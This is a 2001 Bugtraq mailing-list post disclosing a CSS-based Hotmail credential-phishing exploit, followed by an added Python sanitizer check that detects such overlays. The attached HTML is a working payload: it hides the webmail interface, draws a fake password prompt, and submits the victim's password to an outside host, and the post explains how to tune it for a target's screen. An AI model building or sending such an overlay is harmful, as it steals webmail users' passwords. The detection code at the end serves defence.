
hotmail css/div exploit: new version


Date: Tue, 30 Jan 2001 15:16:29 -0000
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: hotmail css/div exploit: new version

This is a multi-part message in MIME format.

------=_NextPart_000_2c04_7347_2d0c
Content-Type: text/plain; format=flowed


hello,

the last exploit was broken with msie 5.50, in fact the background
image didn't appear at all, anyway it was a bad idea to use it.
So i decided to learn a bit more about css and this is a new version
that will work with msie 4/5/5.50, the background color is now fixed as a
blank value (#ffffff) into the div class (thus deleting one useless
connection)

The mail folders navigator input form that buggily appeared on the top layer
was fixed too by playing with its properties (select{ visibility:hidden}).

The scrollbar at the bottom was reduced with the help of the class width
parameter. U will have to choose it according to the screen res of the
trojan receiver, if u don't know ( u should ;) ), just take a big value.

But this exploit isn't absolutely perfect, we have still this advertising
iframe at the top middle and since we can't use javascript to modify its
properties, i have no more idea at least for now.
This iframe tag is really interesting but already filtered by hotmail and
yahoo, may be in some cross-vulnerable sites list that was diffused here
some weeks ago.

Anyway it would be much more than necessary to recover most of hotmail 74
millions mailboxes passwords. it would.

herewith u will find the exploit, just copy it (ctrl-c/v) in a mail to  YOUR
OWN hotmail account.
NOTE: To work properly, the message MUST BEGIN with the html tag (nothing
above).
NOTE2: don't send it to me ;)
and again,

Don't use it for any malicious activity.



Have a nice day

===============
Gregory Duchemin  - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com



------=_NextPart_000_2c04_7347_2d0c
Content-Type: text/html; name="horsemail.html"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="horsemail.html"

<html>
<div align="left">

<style type="text/css">
<!--
div.trojan {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 850px;
height: 950px;
top: 0px;
left: 0px;
visibility: visible;
z-index: 0;
font-family: times;
font-size: 72px;
}
-->
</style>

<div id="layer1" class="trojan">
<div id="layer2" class="trojan" style="left:80px;top:100px;
">

<form name="passwordform" target="_blank" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_blank" AUTOCOMPLETE="OFF" >

        <table cellpadding=0 cellspacing=0 border=0 width=590>
	<tr>
	<td colspan=2>
	<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
	<a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
	</td>
	<td align="CENTER" nowrap>
	<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
        <a href="#" ><font class="f" size=2>Help</font></a><br>
	</td></tr></table>
	</td>
	</tr><tr>
	<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
	<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
	</tr>
	<tr><td height="6"></td></tr>
	<tr valign="top">
	<td><font class="s">

	</font>
	</td>
	<td rowspan=4><font class="s">

	</font>
        </font>
        </td>
	</tr>

        <tr>
        <td>
        <font class="f" size=2><b>&lt;victim@hotmail.com&gt;</b></font>
        <table cellpadding=0 cellspacing=0>
        <tr>
        <td height=35 valign="middle"><font class="sbd">Password</font>&nbsp;</td>
        <td><input type="password" name="passwd" size="16" maxlength="16"></td>
        <td width=22 valign="middle" align="center">&nbsp;</td>
        <td><input type="submit" name="enter" value="Sign in"></td>
        </tr>
        <tr>
        <td></td>
        <td colspan="2"><font class="f" size=2><b><a href="#" >Change
            User</a></b></font></td>
        </tr>
	</table>

        </form>
        </table>
	<table cellpadding=0 cellspacing=0 border=0 width=590>
	<tr>
	<td>&nbsp;
        <font class="s">Hotmail &copy; Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
        <a href="javascript:Filtered()" target="_blank">H0rsemail TERMS OF USE and NOTICES</font></a> &nbsp;
        <a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
	</td>
	</tr>
	</table>





       </div>

       <p align="center">

       </div>

       </div>





<style type="css/text">
<!--
input { visibility: hidden }
select { visibility: hidden; color: #ffffff }
option { visibility: hidden; color: #ffffff }
iframe { visibility: hidden; color: #ffffff }
div {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 0px;
height: 0px;
top: 0px;
left: 0px;
visibility: hidden;
z-index: 1;
font-family: times;
font-size: 72px;
}
-->
</style>

<!--
    Gregory Duchemin  - Security Consultant -
    NEUROCOM CANADA
    1001 bd Maisonneuve Ouest - suite 200
    H3A 3C8 Montreal - Quebec - CANADA
    c3rb3r@hotmail.com

    Just a proof of concept, don't use it for illegal purposes

    Original idea : Ben Li <bali@THOCK.COM>

  -->

<div id="trash">
<!--


------=_NextPart_000_2c04_7347_2d0c--
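
For the receiving side, a check that a webmail sanitizer or mail gateway could run over an HTML body to catch the combination the message relies on: CSS positioning or hiding rules together with a password form that submits to another host. This is an added example, not part of the original post; `MailHtmlAudit`, `audit` and `looks_like_credential_overlay` are hypothetical names, and the sample body is constructed with a placeholder host.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CSS the overlay depends on: absolute positioning, stacking, hiding webmail UI.
RISKY_CSS = re.compile(r"position\s*:\s*(absolute|fixed)|z-index\s*:|visibility\s*:\s*hidden", re.I)

class MailHtmlAudit(HTMLParser):
    """Hypothetical auditor: records risky constructs found in one HTML mail body."""
    def __init__(self):
        super().__init__()
        self.findings, self._css = [], None   # _css is a list only inside <style>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "style":                    # collected whatever its type= says
            self._css = []
        if RISKY_CSS.search(a.get("style", "")):
            self.findings.append("inline-css:" + tag)
        if tag == "form":
            host = urlparse(a.get("action", "")).netloc
            self.findings.append("form:" + (host or "relative"))
        if tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append("password-input")

    def handle_data(self, data):
        if self._css is not None:             # rules wrapped in <!-- --> arrive as data
            self._css.append(data)

    def handle_endtag(self, tag):
        if tag == "style" and self._css is not None:
            if RISKY_CSS.search("".join(self._css)):
                self.findings.append("style-css-overlay")
            self._css = None

def audit(html):
    parser = MailHtmlAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

def looks_like_credential_overlay(findings):
    css = any(f == "style-css-overlay" or f.startswith("inline-css:") for f in findings)
    ext_form = any(f.startswith("form:") and f != "form:relative" for f in findings)
    return css and ext_form and "password-input" in findings

# Constructed sample (not the posted attachment); the host is a placeholder.
SAMPLE = """<html><style type="text/css"><!--
div.cover { position: absolute; top: 0px; left: 0px; width: 850px; z-index: 0; }
--></style><div class="cover"><form action="http://collector.example.invalid/x">
<input type="password" name="passwd"><input type="submit"></form></div></html>"""
```

A sanitizer would normally strip `<style>`, `<form>` and positioning properties outright; the audit form is useful for logging what an incoming message attempted before it was cleaned.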
